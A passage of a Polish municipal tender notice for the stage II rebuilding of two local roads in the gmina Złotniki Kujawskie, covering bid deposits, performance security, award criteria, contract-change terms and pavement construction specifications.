4) Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę , o ile  
    nie wynika z przepisów prawa lub z przedstawionych dokumentów  rejestrowych
5) Dowód wniesienia wadium 
6) W terminie 3 dni od dnia przekazania informacji, o której mowa w art. 86 ust. 5 ustawy Pzp,Wykonawca przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w ust. 1 pkt 23 ustawy Pzp (sporządzone według wzoru Zamawiającego stanowiącego załącznik nr 4  do SIWZ)
Wraz ze złożeniem oświadczenia , Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą  nie prowadzą do zakłócenia  konkurencji w niniejszym postępowaniu.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający wymaga wniesienia wadium zad.1 i zad.2. Wadium wnosi się przed upływem terminu  
    składania ofert.
2. Ustala się wadium dla całości zamówienia w wysokości :
    zad.1 : 10.000,00 zł    słownie: dziesięć tysięcy  złotych 00/100
    zad.2 : 6.000,0 zł słownie: sześć tysięcy złotych
3. Wadium może być wniesione w jednej lub kilku następujących formach, w zależności od  
    wyboru Wykonawcy:
1) w pieniądzu;
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że   
    poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) w gwarancjach bankowych
4) w gwarancjach ubezpieczeniowych
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9
    listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804
    oraz z 2015 r. poz. 978 i 1240)
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
    Bank Spółdzielczy
    numer rachunku:  32  8142 1059  0000  1935  2000  0004
    z adnotacją: wadium   zad. 1 Przebudowa drogi Leszcze- Tuczno etap II"
                           "wadium -  zad.2  Modernizacja drogi Dąbrówka Kuj-Krążkowo etap II"  
5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.

6. Wadium wniesione w pieniądzu należy  złożyć z odpowiednim wyprzedzeniem, tak aby wpłynęło ono
    na rachunek bankowy Zamawiającego przed upływem terminu składania ofert.
    Powyższe zalecenie wynika z czasu trwania rozliczeń międzybankowych. Za termin wniesienia wadium   
     w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego.
7. Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku
     bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku
     bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez
     wykonawcę.
8. Wadium złożone w formie innej niż pieniądz, należy złożyć w formie oryginału, razem z ofertą
    w osobnej kopercie.
9. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać
    stwierdzenie, że  na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium
    zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa
    wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela.
10. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium
(niewniesienie wadium lub wniesienie w sposób nieprawidłowy) oferta wykonawcy podlegać będzie
odrzuceniu.
11. Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze oferty
najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została
wybrana jako najkorzystniejsza.
12. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium
niezwłocznie po zawarciu umowy.
13. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed
upływem terminu składania ofert.
14. Zamawiający zatrzymuje wadium wraz z odsetkami, w przypadku wystąpienia przesłanek określonych
w art. 46 ust 4a i 5 ustawy Pzp.
15. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46
Prawa zamówień publicznych.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres garancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">Postanowienia umowy zawarto w: wzorze umowy, który stanowi - Załącznik nr 7 SIWZ</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">1.Zamawiający przewiduje wniesienie zabezpieczenia należytego wykonania umowy, które służyć będzie
   pokryciu roszczeń z tytułu niewykonania lub nienależytego umowy.
2.Od wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza wymagane będzie wniesienie,
    w określonym terminie, przed podpisaniem umowy zabezpieczenia należytego wykonania umowy
    w wysokości  : zabezpieczenie w wysokości (odrębnie dla poszczególnych zadań) 5% ceny całkowitej 
    podanej w ofercie przedstawionej przez wykonawcę. 
3.Zabezpieczenie należytego wykonania umowy wnoszone jest w jednej lub kilku następujących formach:

3.1) w pieniądzu, przelewem na rachunek bankowy:
 Nr numer rachunku:  32  8142 1059  0000  1935  2000  0004

dane i numer rachunku bankowego zamawiającego dla zabezpieczenia z adnotacją "zabezpieczenie
należytego wykonania umowy   
Zadanie 1 -  Przebudowa drogi gminnej w miejscowości Leszcze - Tuczno  gm.Złotniki Kujawskie etap II
Zadanie 2 - Modernizacja drogi gminnej  w m.Dąbrówka Kujawska - Krążkowo gm.Złotniki Kujawskie etap II  
    a ksero dokumentu przedstawić przed podpisaniem umowy
3.2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z
tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3.3) w gwarancjach bankowych,
3.4) w gwarancjach ubezpieczeniowych,
3.5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9
listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
4. Sposób przekazania zabezpieczenia w formie innej niż pieniądz:
Urząd Gminy Złotniki Kujawskie
ul. Powstańców Wielkopolskich 6,88-180 Złotniki Kujawskie  pok. 11 parter.
5.Zwrot zabezpieczenia należytego wykonania umowy nastąpi w terminie 30 dni od dnia wykonania
   zamówienia i uznania przez zamawiającego za należycie wykonane zadanie pn.:
   Zadanie 1 -  Przebudowa drogi gminnej w miejscowości Leszcze - Tuczno  gm.Złotniki Kujawskie etap II
   Zadanie 2 - Modernizacja drogi gminnej  w m.Dąbrówka Kujawska - Krążkowo gm.Złotniki Kujawskie etap II , z   
   zastrzeżeniem kwoty 30% wysokości   zabezpieczenia, która pozostawiona zostanie na zabezpieczenie 
   roszczeń z tytułu rękojmi za wady.    
   Pozostawiona kwota zostanie zwrócona nie później niż 15 dni po upływie rękojmi za wady.
6.Jeżeli o udzielenie zamówienia ubiegają się wykonawcy występujący wspólnie, ponoszą oni solidarną
    odpowiedzialność za wniesienie zabezpieczenia należytego wykonania umowy.
7.Jeżeli wyłoniony wykonawca nie wniesie w określonym terminie zabezpieczenia należytego wykonania
   umowy zamawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert, bez
   przeprowadzania ich ponownej oceny, chyba, że zachodzi jedna z przesłanek unieważnienia   
   postępowania.
8.W zakresie zabezpieczenia należytego wykonania umowy obowiązują uregulowania Prawa zamówień
   publicznych zawarte w art. od 147 do 151.
</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Zamawiający, poza możliwością zmiany zawartej umowy na podstawie art. 144 ust. 1 pkt 2, 3, 4, 5, 6
   ustawy Pzp, przewiduje również możliwość dokonywania zmian postanowień zawartej umowy, także w
   stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących
   okolicznościach:
1) zmiana terminów wykonania umowy:
1.1) zmiany wynikające z warunków atmosferycznych, które spowodowały niezawinione i niemożliwe do
       uniknięcia przez Wykonawcę opóźnienie, w szczególności:
    a) klęsk żywiołowych,
    b) warunków atmosferycznych odbiegających od typowych dla danej pory roku, uniemożliwiających
        prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
    c) wystąpienie innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny;
1.2) zmiany spowodowane nieprzewidzianymi w SIWZ warunkami  terenowymi, które
       spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w   
       szczególności:
    a) wystąpienie w trakcie prowadzenia robót klęsk żywiołowych,
    b) wystąpienie odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w
       szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych podziemnych 
       urządzeń, instalacji lub obiektów infrastrukturalnych;
1.3) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, które spowodowały
       niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:
     a) wstrzymaniem robót przez Zamawiającego w okolicznościach, za które nie ponosi Wykonawca   
        żadnej odpowiedzialności; 
     b) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji
         technicznej wykonania i odbioru robót  niezbędnych  do prawidłowego wykonania  przedmiotu   
        umowy;
    c) wystąpienie innych szczególnych okoliczności, za które Wykonawca  nie jest odpowiedzialny, 

1.4) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące brakiem
       możliwości prowadzenia robót  lub wykonywania innych czynności przewidzianych umową,
       które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie;

2) zmiana sposobu spełnienia świadczenia:
2.1)  zmiana osób wskazanych w ofercie wykonawcy lub w umowie, przy pomocy których wykonawca
       realizuje przedmiot umowy, na inne osoby spełniające warunki określone w specyfikacji istotnych
      warunków zamówienia, według polityki kadrowej wykonawcy.
2.2) zmiana adresu/siedziby/firmy Zamawiającego/Wykonawcy,
3) pozostałe zmiany spowodowane następującymi okolicznościami:
a) zmiana obowiązującej stawki VAT,
b) wprowadzenia lub zmiany podwykonawcy lub dalszego podwykonawcy robót lub usług lub dostaw,

2.Wszystkie powyższe  postanowienia stanowią katalog zmian 
3.Wszystkie powyższe postanowienia stanowią katalog zmian, na które   Zamawiający może wyrazić  
   zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.

4.Zamawiający przewiduje również możliwość dokonywania nieistotnych zmian postanowień umowy,
    które nie dotyczą treści oferty, na podstawie której dokonano wyboru Wykonawcy.
5.Nie stanowi zmiany umowy:
1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku
     bankowego);
2) zmiana danych teleadresowych.
6.Strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania
   zaistnienia okoliczności, o których mowa w ust. 1. Wniosek o zmianę postanowień umowy musi być
   wyrażony na piśmie.
7. Zmiana umowy może nastąpić wyłącznie w formie pisemnego aneksu pod rygorem nieważności.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 11/05/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie 1 -  Przebudowa drogi gminnej w miejscowości Leszcze - Tuczno  gm.Złotniki                        Kujawskie etap II<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.1.Zadanie 1- Przebudowa drogi gminnej w miejscowości Leszcze - Tuczno  gm.Złotniki   
                         Kujawskie etap II ( 1390,0 m)
Droga objęta zamówieniem stanowi drogę gminną nr 150114C oraz drogę gminną nr 150112C,  przedsięwzięcie etapu II polegać będzie na przebudowie drogi  na odcinku od  km 1+ 200 do km 2+ 590. Pas drogowy jest zmiennej szerokości pozwala  tylko na lokalizację jezdni szerokości 5,00 m oraz zmiennej szerokości pobocze gruntowe. Spływ wody deszczowej odbywa się powierzchniowo na przyległy teren. Zakres robót obejmuje:
  przebudowę konstrukcji jezdni o szerokości 5,00 m,
  budowę nawierzchni zjazdów  do posesji /pas drogowy/,
  powierzchniowe odwodnienie drogi na przyległy teren,
  usunięcie ewentualnych kolizji z istniejącym uzbrojeniem terenu,
  zakres zamówienia obejmuje wycinkę drzew. W związku z powyższym dłużyce zostają własnością   
     Zamawiającego. Dłużyce Wykonawca przekaże Zamawiającemu na teren działki w Mierzwinie.

Branża drogowa 
Roboty rozbiórkowe:
 rozebranie konstrukcji jezdni na włączeniu projektowanego odcinka do istniejących   
   nawierzchni asfaltowych,
 rozebranie istniejącej nawierzchni z tłucznia  gr. 10 20 cm.

Konstrukcja wzmocnienia nawierzchni jezdni:
 warstwa ścieralna z betonu asfaltowego AC 11S gr. 4cm,
 warstwa wiążąca AC 16 W gr. 4 cm,
 podbudowa pomocnicza z kruszywa łamanego stabilizowanego mechanicznie  0/31,5 mm  
   gr.20 cm,
 warstwa mrozoodporna z piasku gr.10 cm,
 stabilizacja gruntu cementem Rm=2,50 MPa gr. 15 cm,


Konstrukcja zjazdów indywidualnych:
 warstwa ścieralna AC 11 S gr. 4cm,
 warstwa wiążąca AC 16 W gr. 4cm,
 podbudowa z kruszywa łamanego stabilizowanego mechanicznie  o grubości 20 cm,
 warstwa odcinająca z piasku grubości 10 cm,
 profilowane i zagęszczone podłoże gruntowe.

Konstrukcja pobocza:
 tłuczeń kamienny gr.15 cm,
 warstwa odcinająca z piasku gr. 10 cm,
 profilowane i zagęszczone podłoże gruntowe.

Branża sanitarna
Projekt przewiduje odprowadzenie wód opadowych z nawierzchni drogi za pomocą spadków 
podłużnych i poprzecznych do istniejących rowów  oraz w pobocza z materiału przepuszczalnego i na teren przyległy w granicach pasa drogowego.

Czasowa organizacja ruchu   na czas wykonania przebudowy zostanie wprowadzone ograniczenie prędkości do 40 km/h, oznakowanie  zgodnie z Projektem Czasowej Organizacji Ruchu. 
Stała Organizacja Ruchu - zgodnie z Projektem Stałej Organizacji Ruchu 
Oznakowanie pionowe ;wymiana wszystkich istniejących znaków  na nowe oraz zaprojektowane zmiany oznakowania pionowego wynikające  z wprowadzonej nowej geometrii drogi, a tym samym konieczności dostosowania do niej oznakowania pionowego, szczegółowa  lokalizacja przedstawiona została w części rysunkowej.
Oznakowanie poziome; oznakowaniem poziomym objęto skrzyżowanie przedmiotowej drogi gminnej  z  drogą powiatową  nr 2512C w km 2+280.
Szczegółowe oznaczenie zgodnie z częścią rysunkową. Należy uwzględnić zmiany i uwagi  Starosty Inowrocławskiego do zatwierdzonego  projektu stałej organizacji ruchu przedstawione w załączeniu.

Szczegółowy zakres zamówienia  zawiera:
Projekt budowlano-wykonawczy, Projekt czasowej organizacji ruchu, Projekt stałej organizacji ruchu , Specyfikacja techniczna wykonania i odbioru robót, wymagania zawarte w specyfikacji istotnych warunków zamówienia (siwz), natomiast przedmiar robót jest  elementem pomocniczym.
Przedmiary robót stanowią dokumenty pomocnicze do wyceny zadania.
Załączniki do SIWZ:
	Projekt budowlano-wykonawczy 
	Projekt tymczasowej organizacji ruchu 
	Projekt stałej organizacji ruchu 
	Szczegółowa Specyfikacja Techniczna 
	Opinia geotechniczna
	Przedmiar robót 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233000-9, 45100000-8,
                    45111000-8,
                    45233000-9,
                    45233000-9,
                    45233280-5,
                    45233000-9,
                    45231300-8,
                    45233000-9,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/08/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okes gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie 2 - Modernizacja drogi gminnej  w m.Dąbrówka Kujawska - Krążkowo gm.Złotniki                      Kujawskie etap II  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.2.Zadanie 2 - Modernizacja drogi gminnej w miejscowości Dąbrówka  Kujawska - Krążkowo, gm. Złotniki Kujawskie etap II (781,4 m)
  
Zakres zamówienia obejmuje:  

Droga objęta zamówieniem przebiega przez gminę Złotniki Kujawskie w woj. kujawsko-pomorskim i stanowi drogę gminną nr 150110C.Droga gminna  nr 150110C łączy drogę wojewódzką  nr 246  w miejscowości Dąbrówka Kujawska z drogą powiatową nr 1539C  w miejscowości Krążkowo. Odcinek drogi przewidziany do realizacji w II etapie rozpoczyna się od km 2+470  do km 3+251,4 .Pas drogowy jest zmiennej szerokości , pozwala tylko na lokalizację jezdni szerokości 5,00 m oraz zmiennej szerokości pobocze gruntowe.
Branża drogowa

Roboty rozbiórkowe - rozebranie konstrukcji jezdni na włączeniu projektowanego odcinka do istniejącej nawierzchni asfaltowej,

Konstrukcja wzmocnienia nawierzchni jezdni:
- warstwa ścieralna z betonu asfaltowego AC 11 S gr 4 cm,
- warstwa wiążąca  AC 16 W gr 4 cm,
- podbudowa pomocnicza z kruszywa łamanego stabilizowanego mechanicznie  0/31,5 mm  
  gr. 20 cm,
- warstwa mrozoodporna z piasku gr 10 cm,
- stabilizacja gruntu cementem Rm= 2,50 MPa gr 15 cm,

Konstrukcja zjazdów indywidualnych
- warstwa ścieralna AC 11 S gr 4 cm,
- warstwa wiążąca AC 16 W gr 4 cm,
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie o grubości 20 cm,
- warstwa odcinająca z piasku grubości 10 cm,
- profilowane i zagęszczone podłoże gruntowe

Konstrukcja pobocza
- tłuczeń kamienny gr 15 cm
- warstwa odcinająca z piasku gr 10 cm, 
- profilowane i zagęszczone podłoże gruntowe
Odwodnienie drogi odbywać się będzie powierzchniowo na przyległy teren.

Czasowa organizacja ruchu  obejmuje zakres od etapu I do IV  zgodnie z Projektem Czasowej Organizacji Ruchu 
Stała Organizacja Ruchu: wg Projektu stałej organizacji ruchu.
Organizacja ruchu
Przyjęta organizacja ruchu wynika wprost z zaprojektowanej geometrii drogi w projekcie budowlanym  branży drogowej, dla przedmiotowej inwestycji.  Uwzględnia istniejącą organizację ruchu na przebudowywanym odcinku drogi oraz istniejącą geometrię dróg sąsiadujących z zakresem opracowania, a także istniejącą organizację ruchu na obszarze przyległym do tego zakresu.
Oznakowanie pionowe 
Zaprojektowano wymianę wszystkich istniejących znaków na nowe oraz zaprojektowane zmiany oznakowania pionowego wynikają z wprowadzonej nowej geometrii drogi, a tym samym konieczności dostosowania do niej oznakowania pionowego. Szczegółowa lokalizacja została przedstawiana w części rysunkowej.
Oznakowanie poziome
Oznakowanie poziome przedstawione w niniejszym projekcie to oznakowanie
projektowane (docelowe), które powinno znajdować się na drogach wchodzących w zakres niniejszego opracowania po jego wprowadzeniu. W przypadku dobrej widoczności istniejącego oznakowanie poziomego  kolidującego z projektowanym oznakowaniem poziomym, istniejące oznakowanie należy usunąć tak, aby nie było wątpliwości, które oznakowanie jest obowiązujące.
Szczegółowa oznakowania poziomego została przedstawiana w części rysunkowej projektu stałej organizacji ruchu.

3.1.Szczegółowy zakres zamówienia  zawiera:
Szczegółowy zakres zamówienia zawiera dokumentacja projektowa  , specyfikacja techniczna wykonania i odbioru robót , wymagania zawarte w specyfikacji istotnych warunków zamówienia (siwz), natomiast przedmiar robót jest  jedynie elementem pomocniczym dla Wykonawcy.
Przedmiar robót stanowi jedynie dokument pomocniczy .
Załączniki do SIWZ:
 Przedmiar robót - Załączniki nr 9
 Dokumentacja projektowa   Załącznik nr 10
    a) Projekt budowlano-wykonawczy 
 Specyfikacja Techniczna Wykonania i Odbioru Robót (STWiOR)   Załącznik nr 11.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233000-9, 45100000-8,
                    45111000-8,
                    45233000-9,
                    45233000-9,
                    45233280-5,
                    45233000-9,
                    45231300-8,
                    45233000-9,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
